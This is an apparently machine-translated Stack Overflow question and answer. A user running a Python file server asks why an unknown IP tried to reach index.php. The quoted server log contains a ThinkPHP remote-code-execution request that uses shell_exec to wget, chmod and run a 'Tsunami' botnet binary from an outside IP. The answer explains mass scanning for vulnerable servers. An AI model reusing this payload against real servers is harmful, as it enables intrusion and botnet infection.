几分钟前,我运行了一个基于 python 的服务器来与我的 friend 共享一些文件。我禁用了 Windows 防火墙,以便他可以连接并下载文件。当有人尝试连接服务器时,Python 会显示他们的 IP 地址和他们请求的路径。
我不认识的人试图获取我的index.php并运行wget。我查了他们的IP地址,看来他们来自日本。那么,这个人是如何知道我的 IP 地址并尝试连接到我的计算机的呢?我只在 WhatsApp 上与我的 friend 分享了它。
我以前已经做过很多次了,这是第一次发生这样的事情。
61.192.55.32 - - [06/Jan/2019 01:27:16] code 400, message Bad request syntax ("GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1")
61.192.55.32 - - [06/Jan/2019 01:27:16] "GET /index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1" 400 -
最佳答案
有很多人正在运行像 Masscan 这样的工具。使用自定义脚本寻找易受攻击的 Web 服务器。大多数时候,此类脚本会尝试获取反向 shell,以试图建立僵尸网络大军。有一些关于连接到互联网的 Windows 机器在 SO 完成安装之前被黑客攻击的报道。
关于python-3.x - Python 3 http.server - 一个奇怪的IP地址试图连接我的服务器,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/54057026/